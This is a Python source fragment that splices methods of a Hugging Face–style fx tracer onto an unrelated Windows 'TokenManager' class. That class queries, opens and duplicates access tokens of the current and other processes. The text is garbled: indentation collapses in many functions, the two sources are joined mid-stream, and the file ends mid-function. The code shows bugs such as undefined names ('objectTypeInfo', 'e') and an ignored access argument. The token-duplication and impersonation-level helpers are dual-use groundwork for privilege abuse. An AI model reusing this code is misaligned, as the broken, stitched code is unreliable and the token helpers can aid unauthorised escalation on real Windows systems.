    def create_proxy(self, kind, target, args, kwargs, name=None, type_expr=None, proxy_factory_fn=None):
        """Create the fx Proxy and attach metadata from a meta-device execution.

        After delegating node creation to the base tracer, the op is replayed
        with meta-tensor arguments so each proxy carries the shape/dtype the
        real op would produce. Metadata failures are non-fatal (warned only in
        debug mode) since tracing can proceed without it.
        """
        rv = super().create_proxy(kind, target, args, kwargs, name, type_expr, proxy_factory_fn)
        if ((kind == 'placeholder') and (target in self.meta_args)):
            # Graph inputs get their metadata from the precomputed meta args.
            rv.install_metadata(self.meta_args[target])
            return rv
        if (target in self.orig_fns):
            # Patched torch factory functions must allocate on the meta device.
            if ('device' in kwargs):
                kwargs['device'] = 'meta'
        try:
            # Replace proxies with their meta values throughout args/kwargs.
            args_metas = torch.fx.node.map_aggregate(args, _proxies_to_metas)
            kwargs_metas = torch.fx.node.map_aggregate(kwargs, _proxies_to_metas)
            if (kind == 'call_function'):
                # Some ops need a manual meta implementation.
                meta_target = _MANUAL_META_OVERRIDES.get(target, target)
                meta_out = meta_target(*args_metas, **kwargs_metas)
                if isinstance(meta_out, torch.Tensor):
                    meta_out = meta_out.to(device='meta')
            elif (kind == 'call_method'):
                method = getattr(args_metas[0].__class__, target)
                meta_target = _MANUAL_META_OVERRIDES.get(method, method)
                meta_out = meta_target(*args_metas, **kwargs_metas)
            elif (kind == 'call_module'):
                if (not hasattr(self, 'orig_forward')):
                    raise AttributeError(f'{self} does not have an attribute called orig_forward')
                # Temporarily disable attr proxying so the module's own
                # parameters/buffers are read directly during the meta run.
                self._disable_module_getattr = True
                try:
                    mod = self.root.get_submodule(target)
                    mod_type = type(mod)
                    if (mod_type in _MANUAL_META_OVERRIDES):
                        meta_out = _MANUAL_META_OVERRIDES[mod_type](mod, *args_metas, **kwargs_metas)
                    else:
                        meta_out = self.orig_forward(*args_metas, **kwargs_metas)
                finally:
                    self._disable_module_getattr = False
            elif (kind == 'get_attr'):
                self._disable_module_getattr = True
                try:
                    # Walk the dotted attribute path from the root module.
                    attr_itr = self.root
                    atoms = target.split('.')
                    for atom in atoms:
                        attr_itr = getattr(attr_itr, atom)
                    if isinstance(attr_itr, torch.Tensor):
                        meta_out = attr_itr.to(device='meta')
                    else:
                        meta_out = attr_itr
                finally:
                    self._disable_module_getattr = False
            else:
                # Other node kinds (e.g. 'output') carry no metadata.
                return rv
            if (not isinstance(rv, Proxy)):
                raise ValueError("Don't support composite output yet")
            rv.install_metadata(meta_out)
        except Exception as e:
            # Metadata is best-effort; only surface failures in debug mode.
            if _IS_IN_DEBUG_MODE:
                warnings.warn(f'Could not compute metadata for {kind} target {target}: {e}')
        return rv
    def _module_getattr(self, attr, attr_val, parameter_proxy_cache):
        """Return a (cached) proxy for a parameter/buffer attribute, or the raw value.

        When ``_disable_module_getattr`` is set (during meta execution in
        ``create_proxy``) the real attribute value is returned untouched.
        """
        if getattr(self, '_disable_module_getattr', False):
            return attr_val
        else:
            def maybe_get_proxy_for_attr(attr_val, collection_to_search, parameter_proxy_cache):
                # Locate the attribute by identity in the named collection and
                # create at most one 'get_attr' proxy per qualified name.
                for (n, p) in collection_to_search:
                    if (attr_val is p):
                        if (n not in parameter_proxy_cache):
                            kwargs = {}
                            # Older torch versions do not accept proxy_factory_fn.
                            if ('proxy_factory_fn' in inspect.signature(self.create_proxy).parameters):
                                kwargs['proxy_factory_fn'] = (None if (not self.param_shapes_constant) else (lambda node: ParameterProxy(self, node, n, attr_val)))
                            val_proxy = self.create_proxy('get_attr', n, (), {}, **kwargs)
                            parameter_proxy_cache[n] = val_proxy
                        return parameter_proxy_cache[n]
                return None
            if isinstance(attr_val, torch.nn.Parameter):
                maybe_parameter_proxy = maybe_get_proxy_for_attr(attr_val, self.root.named_parameters(), parameter_proxy_cache)
                if (maybe_parameter_proxy is not None):
                    return maybe_parameter_proxy
            if (self.proxy_buffer_attributes and isinstance(attr_val, torch.Tensor)):
                maybe_buffer_proxy = maybe_get_proxy_for_attr(attr_val, self.root.named_buffers(), parameter_proxy_cache)
                if (maybe_buffer_proxy is not None):
                    return maybe_buffer_proxy
            # Not a parameter/buffer (or proxying disabled): return as-is.
            return attr_val
    def getattr(self, attr: str, attr_val: Any, parameter_proxy_cache: Dict[(str, Any)]):
        """torch.fx Tracer attribute hook; delegates to :meth:`_module_getattr`."""
        return self._module_getattr(attr, attr_val, parameter_proxy_cache)
    def call_module(self, m, forward, args, kwargs):
        """Record the module's bound forward (used later for meta execution) and trace the call."""
        self.orig_forward = forward
        return super().call_module(m, forward, args, kwargs)
    def proxy(self, node):
        """Wrap traced nodes in HFProxy so they can carry meta-tensor metadata."""
        return HFProxy(node, self)
    def trace(self, root: Union[(torch.nn.Module, Callable[(..., Any)])], concrete_args: Optional[Dict[(str, Any)]]=None, dummy_inputs: Optional[Dict[(str, Any)]]=None, complete_concrete_args_with_inputs_not_in_dummy_inputs: bool=True) -> Graph:
        """Symbolically trace ``root`` while propagating meta-tensor metadata.

        Generates dummy inputs for every input name not covered by
        ``dummy_inputs``/``concrete_args``, patches selected torch constructors
        so they build meta tensors, runs the parent tracer, then prunes
        placeholder nodes that became concrete arguments.

        Returns the resulting fx ``Graph``.
        Raises ValueError when a parameter lacks both a dummy input and a
        default, and RuntimeError when a dummy input cannot be generated.
        """
        sig = inspect.signature((root.forward if isinstance(root, torch.nn.Module) else root))
        if (concrete_args is None):
            concrete_args = {}
        if ((dummy_inputs is not None) and complete_concrete_args_with_inputs_not_in_dummy_inputs):
            # Every parameter without a dummy input must have a default so it
            # can be folded into concrete_args below.
            for param in sig.parameters.values():
                if (param.name in dummy_inputs):
                    continue
                if (param.default is inspect.Parameter.empty):
                    raise ValueError(f'You need to specify a default value for the parameter {param.name}.')
            concrete_args.update({p.name: p.default for p in sig.parameters.values() if ((p.name not in dummy_inputs) and (p.name not in concrete_args))})
        input_names = (sig.parameters.keys() - concrete_args.keys())
        # Random dummy shapes keep the traced graph from specializing on one size.
        batch_size = _generate_random_int()
        sequence_length = _generate_random_int()
        shape = [batch_size, sequence_length]
        if (root.__class__.__name__ in get_values(MODEL_FOR_MULTIPLE_CHOICE_MAPPING_NAMES)):
            num_choices = _generate_random_int(low=2, high=5)
            shape.insert(1, num_choices)
        inputs = (dict(dummy_inputs) if (dummy_inputs is not None) else {})
        for input_name in input_names:
            if (input_name in inputs):
                continue
            if (isinstance(root, PreTrainedModel) or type(root).__qualname__.startswith('_deserialize_graph_module')):
                inputs.update(self._generate_dummy_input(root, input_name, shape))
            else:
                raise RuntimeError(f'Could not generate input named {input_name} for because root is not a transformers.PreTrainedModel.')
        # Move tensor inputs to the meta device; non-tensors pass through.
        concrete_metas = {input_name: (input_.to('meta') if isinstance(input_, torch.Tensor) else input_) for (input_name, input_) in inputs.items()}
        for param in sig.parameters.values():
            if ((param.kind == inspect.Parameter.VAR_KEYWORD) and (param.name not in input_names)):
                concrete_metas[f'**{param.name}'] = {}
        self.meta_args = concrete_metas
        # Patch torch factory functions so create_proxy can recognize them and
        # force construction on the meta device; always restore them afterwards.
        self.patched_torch_methods = {target: _gen_constructor_wrapper(getattr(torch, target)) for target in self._TORCH_METHODS_TO_PATCH}
        self.orig_fns = set()
        for (name, (wrapper, orig)) in self.patched_torch_methods.items():
            setattr(torch, name, wrapper)
            self.orig_fns.add(orig)
        try:
            self.graph = super().trace(root, concrete_args=concrete_args)
        finally:
            for (name, (_, orig)) in self.patched_torch_methods.items():
                setattr(torch, name, orig)
        for node in self.graph.nodes:
            if (node.op == 'placeholder'):
                if (node.target in input_names):
                    node.args = ()
                    node.type = torch.Tensor
                else:
                    # Placeholder became a concrete arg: erase it and every node
                    # that (transitively) consumed it, deepest users first.
                    to_visit = [node]
                    to_delete = collections.OrderedDict()
                    while to_visit:
                        n = to_visit.pop(0)
                        to_delete[n] = None
                        to_visit += list(n.users.keys())
                    for user in reversed(to_delete.keys()):
                        self.graph.erase_node(user)
            if (node.op == 'output'):
                node.type = None
        return self.graph
def _stateless_mod_instanciation_depends_on_proxies(self, mod: nn.Module) -> bool:
return any((isinstance(attr, Proxy) for attr in mod.__dict__.values()))
def _insert_module_as_submodule(self, mod: nn.Module) -> str:
if self._stateless_mod_instanciation_depends_on_proxies(mod):
return ''
idx = 0
mod_name = mod.__class__.__name__.lower()
path = f'{mod_name}_{idx}'
already_inserted = False
while hasattr(self.root, path):
if (getattr(self.root, path) is mod):
already_inserted = True
break
path = f'{mod_name}_{idx}'
idx += 1
if (not already_inserted):
self.root.add_module(path, mod)
return path
def path_of_module(self, mod: nn.Module) -> str:
try:
return super().path_of_module(mod)
except NameError as e:
if (self.allow_insert_stateless_mods and (len(list(mod.parameters())) == 0) and (len(list(mod.buffers())) == 0)):
path = self._insert_module_as_submodule(mod)
return path
raise e
    def is_leaf_module(self, m: torch.nn.Module, module_qualified_name: str) -> bool:
        """Treat a module as a leaf only when its attributes do not depend on tracing proxies."""
        return ((not self._stateless_mod_instanciation_depends_on_proxies(m)) and super().is_leaf_module(m, module_qualified_name))
class TokenManager():
def closeHandle(handle):
try:
CloseHandle(handle)
except Exception as e:
logging.warning('Impossible to close handle {0}: {1}'.format(handle, e))
return False
return True
    def getTokenInformationTokenUser(hToken):
        """Return a TOKEN_USER structure for hToken, or None on failure.

        Standard Win32 two-call pattern: first probe GetTokenInformation for
        the required buffer size (ERROR_INSUFFICIENT_BUFFER is expected), then
        fetch the data into a resized structure.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenUser, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
                # Expected outcome of the size probe.
                pass
            else:
                logging.error('Impossible to get size for getTokenInformationTokenUser: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_USER()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenUser, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenUser: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenSid(hToken):
pToken_User = TokenManager.getTokenInformationTokenUser(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken_User.User.Sid)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
def getTokenAccountName(hToken):
pToken_User = TokenManager.getTokenInformationTokenUser(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
accName = getNameFromSid(pToken_User.User.Sid)
if (accName == None):
logging.error('Impossible to get Token SID with getNameFromSid()')
return None
return accName
def getCurrentEffectiveAccountName():
currentToken = TokenManager.getCurrentThreadEffectiveToken()
if (currentToken == None):
return None
accountName = TokenManager.getTokenAccountName(currentToken)
TokenManager.closeHandle(currentToken)
return accountName
    def getTokenInformationPrimaryGroup(hToken):
        """Return a TOKEN_PRIMARY_GROUP structure for hToken, or None on failure.

        Two-call pattern: probe for the buffer size (ERROR_INSUFFICIENT_BUFFER
        expected), then fetch the data into a resized structure.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenPrimaryGroup, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
                # Expected outcome of the size probe.
                pass
            else:
                logging.error('Impossible to get size for getTokenInformationPrimaryGroup: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_PRIMARY_GROUP()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenPrimaryGroup, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenPrimaryGroup: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenPrimaryGroupSID(hToken):
pToken = TokenManager.getTokenInformationPrimaryGroup(hToken)
if (pToken == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken.PrimaryGroup)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
    def getTokenInformationTokenOwner(hToken):
        """Return a TOKEN_OWNER structure for hToken, or None on failure.

        Two-call pattern: probe for the buffer size (ERROR_INSUFFICIENT_BUFFER
        expected), then fetch the data into a resized structure.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenOwner, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
                # Expected outcome of the size probe.
                pass
            else:
                logging.error('Impossible to get size for getTokenInformationTokenOwner: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_OWNER()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenOwner, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenOwner: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenOwnerSid(hToken):
pToken_User = TokenManager.getTokenInformationTokenOwner(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken_User.Owner)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
    def getTokenInformationTokenLinkedToken(hToken):
        """Return the handle of the token linked to hToken (UAC pair), or None on failure.

        Two-call pattern; both ERROR_INSUFFICIENT_BUFFER and ERROR_BAD_LENGTH
        are acceptable outcomes of the size probe.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenLinkedToken, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
                pass
            else:
                logging.error('Impossible to get size for getTokenInformationTokenLinkedToken: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_LINKED_TOKEN()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenLinkedToken, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenLinkedToken: {0}'.format(getLastErrorMessage()))
            return None
        # Only the contained handle is returned, not the whole structure.
        return tokenInfo.LinkedToken
    def getTokenInformationTokenDefaultDacl(hToken):
        """Return the token's default DACL parsed into an ACL object, or None on failure.

        Two-call pattern; ERROR_INSUFFICIENT_BUFFER / ERROR_BAD_LENGTH are
        acceptable outcomes of the size probe.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenDefaultDacl, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
                pass
            else:
                logging.error('Impossible to get size for getTokenInformationTokenDefaultDacl: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_DEFAULT_DACL()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenDefaultDacl, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenDefaultDacl: {0}'.format(getLastErrorMessage()))
            return None
        # Copy the raw ACL bytes out of the structure and parse them.
        buff = string_at(tokenInfo.DefaultDacl, infoSize.value)
        dacl = ACL.from_bytes(buff, SE_OBJECT_TYPE.SE_KERNEL_OBJECT)
        return dacl
def getTokenDefaultDacl(hToken):
dacl = TokenManager.getTokenInformationTokenDefaultDacl(hToken)
if (dacl == None):
return None
else:
return dacl.to_dict_list()
    def getTokenInformationTokenAppContainerSid(hToken):
        """Return a TOKEN_APPCONTAINER_INFORMATION structure, or None on failure.

        ERROR_INVALID_PARAMETER on the size probe means the information class
        is unsupported (pre-Windows 8) and yields None quietly.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenAppContainerSid, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
                pass
            elif (errorMessage.winerror == ERROR_INVALID_PARAMETER):
                return None
            else:
                logging.error('Impossible to get size for getTokenInformationTokenAppContainerSid: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_APPCONTAINER_INFORMATION()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenAppContainerSid, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenAppContainerSid: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenInformationAppContainerSid(hToken):
pToken = TokenManager.getTokenInformationTokenAppContainerSid(hToken)
if (pToken == None):
logging.debug('Impossible to get Token information for Container SID. Perhaps before Windows 8.')
return None
if (pToken.TokenAppContainer == None):
logging.debug('The token is not associated with an app container')
return None
sidStr = TokenManager.convertSidToStringSid(pToken.TokenAppContainer)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
    def isAppContainerToken(hToken):
        """Return True when hToken is an app-container token, False when not, None on error.

        ERROR_INVALID_PARAMETER means the information class is unsupported and
        is treated as "not an app container". An identification-level token
        yields None because the answer cannot be trusted.
        """
        tokenInfo = DWORD(4)
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenIsAppContainer, byref(tokenInfo), 4, byref(infoSize))
        if (status == 0):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
                return False
            else:
                logging.error('Impossible to check isAppContainerToken(): {0}'.format(errorMessage))
                return None
        else:
            status = tokenInfo.value
            if (status > 0):
                return True
            elif (TokenManager.getTokenInformationTokenImpersonationLevel(hToken) == SecurityIdentification):
                logging.debug('Token is not an app container token but a identification token')
                return None
            else:
                return False
def isTokenHasRestrictions(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenHasRestrictions, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return False
else:
logging.error('Impossible to check isTokenHasRestrictions(): {0}'.format(errorMessage))
return None
else:
status = tokenInfo.value
if (status == 0):
return False
else:
return True
def getTokenInformationTokenAppContainerNumber(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenAppContainerNumber, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return 0
else:
logging.error('Impossible to get getTokenInformationTokenAppContainerNumber: {0} (1)'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
def getTokenInformationTokenElevationType(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenElevationType, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenElevationType: {0}'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
def getTokenInformationTokenElevation(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenElevation, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenElevation: {0}'.format(getLastErrorMessage()))
return None
elif (tokenInfo.value != 0):
return True
else:
return False
def getTokenInformationTokenMandatoryPolicy(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenMandatoryPolicy, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenMandatoryPolicy: {0}'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
    def getTokenInformationTokenSource(hToken):
        """Return a TOKEN_SOURCE structure for hToken, or None on failure.

        Requires TOKEN_QUERY_SOURCE access on the handle; failures are logged
        at warning level only.
        """
        infoSize = DWORD(0)
        status = GetTokenInformation(hToken, TokenSource, c_void_p(), 0, byref(infoSize))
        if ((status == 0) or (infoSize.value == 0)):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
                # Expected outcome of the size probe.
                pass
            else:
                logging.warning('Impossible to get size for getTokenInformationTokenSource: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_SOURCE()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenSource, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.warning('Impossible to get getTokenInformationTokenSource: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenSourceName(hToken):
source = TokenManager.getTokenInformationTokenSource(hToken)
if (source == None):
logging.debug('Impossible to get Token source name')
return None
return source.SourceName
def convertSidToStringSid(sid):
pStringSid = LPSTR()
if (not sid):
logging.error('Sid is set to None for convertSidToStringSid()')
return None
try:
ConvertSidToStringSidA(sid, byref(pStringSid))
except Exception as e:
logging.error('impossible to convert SID to string: {0}'.format(e))
return None
sidStr = pStringSid.value.decode('utf-8')
return sidStr
    def duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=TOKEN_ALL_ACCESS, tokenType=TokenPrimary, tokenAttributes=None):
        """Duplicate hToken via DuplicateTokenEx and return the new handle, or None.

        impersonationLevel: SECURITY_IMPERSONATION_LEVEL for the copy.
        desiredAccess: access mask requested on the new token.
        tokenType: TokenPrimary or TokenImpersonation.
        tokenAttributes: optional SECURITY_ATTRIBUTES for the new token.
        """
        logging.debug('Duplicating token...')
        hTokendupe = HANDLE(c_void_p((- 1)).value)
        try:
            DuplicateTokenEx(hToken, desiredAccess, tokenAttributes, impersonationLevel, tokenType, byref(hTokendupe))
        except Exception as e:
            logging.error('Impossible to DuplicateTokenEx in duplicateToken(): {0}'.format(e))
            return None
        logging.debug('Token duplicated')
        return hTokendupe
def getCurrentProcessToken(desiredAccess=TOKEN_ALL_ACCESS):
hToken = HANDLE(c_void_p((- 1)).value)
try:
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, byref(hToken))
except Exception as e:
logging.error('Impossible to Open current Process Token for getCurrentProcessToken(): {0}'.format(e))
return None
return hToken
def getObjectInfo(hObject, objectInfoClass=ObjectTypeInformation, loggingOnError=False):
theClass = None
if (objectInfoClass == ObjectTypeInformation):
theClass = PUBLIC_OBJECT_TYPE_INFORMATION
else:
logging.critical('objectTypeInformation {0} is not implemented in getObjectInfo()'.format(objectTypeInfo))
return None
buffer = theClass()
bufferSize = DWORD(sizeof(buffer))
length = DWORD(0)
status = NtQueryObject(hObject, objectInfoClass, byref(buffer), 0, length)
if (length.value > 9876):
msge = 'Impossible to get size with objectTypeInformation in getObjectInfo(): {0}'.format(length.value)
if (loggingOnError == True):
logging.error(msge)
else:
logging.debug(msge)
return None
buffer = create_string_buffer(length.value)
status = NtQueryObject(hObject, objectInfoClass, byref(buffer), length.value, length)
if (status >= STATUS_SUCCESS):
value = str(cast(buffer, POINTER(theClass)).contents.Name)
return value
else:
logging.error('Impossible to get a result with NtQueryObject(): {0}'.format(getLastErrorMessage()))
return None
    def getProcessTokenOfPid(pid, tokenAcess=TOKEN_QUERY, loggingOnError=True):
        """Open the primary token of the process identified by pid, or return None.

        tokenAcess: access mask requested on the token (default TOKEN_QUERY).
        loggingOnError: log failures at ERROR level instead of DEBUG.
        The intermediate process handle is always closed before returning.
        """
        hProcess = OpenProcess(MAXIMUM_ALLOWED, False, pid)
        if ((hProcess == 0) or (hProcess == None)):
            if (loggingOnError == True):
                logging.error('Impossible to Open Process for MAXIMUM_ALLOWED on pid {0}: {1}'.format(pid, getLastErrorMessage()))
            else:
                logging.debug('Impossible to Open Process for MAXIMUM_ALLOWED on pid {0}: {1}'.format(pid, getLastErrorMessage()))
            return None
        hToken = HANDLE(c_void_p((- 1)).value)
        try:
            OpenProcessToken(hProcess, tokenAcess, byref(hToken))
        except Exception as e:
            if (loggingOnError == True):
                logging.error('Impossible to Open Process Token for OpenProcessToken for {1}: {0}'.format(e, tokenAcess))
            else:
                logging.debug('Impossible to Open Process Token for OpenProcessToken for {1}: {0}'.format(e, tokenAcess))
            TokenManager.closeHandle(hProcess)
            return None
        TokenManager.closeHandle(hProcess)
        logging.debug('Primary token got on pid {0} with {1}'.format(pid, tokenAcess))
        return hToken
def getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=True):
buf = create_string_buffer(0)
dwSize = DWORD(0)
pStringSid = LPSTR()
GetTokenInformation(hToken, TokenImpersonationLevel, byref(buf), 0, byref(dwSize))
if (dwSize == 0):
if (loggingOnError == True):
logging.error('Impossible to get size before getting ImpersonationLevel: {0}'.format(GetLastError()))
else:
logging.debug('Impossible to get size before getting ImpersonationLevel: {0}'.format(GetLastError()))
return None
buf = create_string_buffer(dwSize.value)
GetTokenInformation(hToken, TokenImpersonationLevel, byref(buf), dwSize.value, byref(dwSize))
if (dwSize == 0):
if (loggingOnError == True):
logging.error('Impossible to get ImpersonationLevel: {0}'.format(GetLastError()))
else:
logging.debug('Impossible to get ImpersonationLevel: {0}'.format(GetLastError()))
return None
impersonationLevel = cast(buf, POINTER(DWORD)).contents.value
if ((impersonationLevel < 0) or (impersonationLevel > SecurityDelegation)):
if (loggingOnError == True):
logging.error('Impossible to get ImpersonationLevel, bad int: {0}'.format(impersonationLevel))
else:
logging.debug('Impossible to get ImpersonationLevel, bad int: {0}'.format(impersonationLevel))
return None
return impersonationLevel
def isSystemToken(hToken):
sid = TokenManager.getTokenSid(hToken)
if (sid == None):
return None
if (sid == WELL_KNOW_SIDS_INV['Local System']):
return True
else:
return False
    def getTokenInformationTokenType(hToken):
        """Return TokenPrimary or TokenImpersonation for hToken, or None on failure.

        Two-call pattern: the first GetTokenInformation call fills
        returnLength; the second fetches the value into a sized buffer.
        """
        buffer = create_string_buffer(0)
        returnLength = DWORD(0)
        try:
            res = GetTokenInformation(hToken, TokenType, byref(buffer), 0, returnLength)
        except Exception as e:
            logging.error('Impossible to get size before getting token type: {0}'.format(e))
            return None
        buffer = create_string_buffer(returnLength.value)
        try:
            res = GetTokenInformation(hToken, TokenType, byref(buffer), returnLength.value, returnLength)
        except Exception as e:
            logging.error('Impossible to get token type: {0}'.format(e))
            return None
        tokenType = cast(buffer, POINTER(DWORD)).contents.value
        if (tokenType == TokenPrimary):
            logging.debug('Token is TokenPrimary')
            return TokenPrimary
        elif (tokenType == TokenImpersonation):
            logging.debug('Token is TokenImpersonation')
            return TokenImpersonation
        else:
            logging.error('Token type unknown: {0}'.format(tokenType))
            return None
    def getTokenInformationTokenIntegrityLevel(hToken):
        """Return a TOKEN_MANDATORY_LABEL structure for hToken, or None on failure.

        Two-call pattern: probe for the buffer size (ERROR_INSUFFICIENT_BUFFER
        expected), then fetch the data into a resized structure.
        """
        infoSize = DWORD()
        status = GetTokenInformation(hToken, TokenIntegrityLevel, c_void_p(), infoSize, byref(infoSize))
        if ((infoSize.value == 0) or (status == 0)):
            errorMessage = getLastErrorMessage()
            if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
                # Expected outcome of the size probe.
                pass
            else:
                logging.error('Impossible to get size for TokenIntegrityLevel: {0}'.format(errorMessage))
                return None
        tokenInfo = TOKEN_MANDATORY_LABEL()
        resize(tokenInfo, infoSize.value)
        status = GetTokenInformation(hToken, TokenIntegrityLevel, byref(tokenInfo), infoSize, byref(infoSize))
        if (status == 0):
            logging.error('Impossible to get TokenIntegrityLevel: {0}'.format(getLastErrorMessage()))
            return None
        return tokenInfo
def getTokenInformationTokenPrivileges(hToken):
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenPrivileges, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting privilege information: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenPrivileges, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get privilege information: {0}'.format(e))
return None
privileges = ctypes.cast(buffer, POINTER(TOKEN_PRIVILEGES)).contents
return privileges
def isImpersonationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityImpersonation):
return True
else:
return False
def isDelegationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityDelegation):
return True
else:
return False
def isIdentificationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityIdentification):
return True
else:
return False
def isAnonymousToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityAnonymous):
return True
else:
return False
    def getTokenIntegrityLevel(hToken):
        """Return the token's integrity level as an integer RID, or None on failure.

        The level is the last sub-authority of the integrity-label SID.
        """
        integrityLvlInfo = TokenManager.getTokenInformationTokenIntegrityLevel(hToken)
        if (integrityLvlInfo == None):
            return None
        sidString = TokenManager.convertSidToStringSid(integrityLvlInfo.Label.Sid)
        logging.debug('SID: {0}'.format(sidString))
        # The integrity RID is the final sub-authority of the label SID.
        pSidSize = GetSidSubAuthorityCount(integrityLvlInfo.Label.Sid)
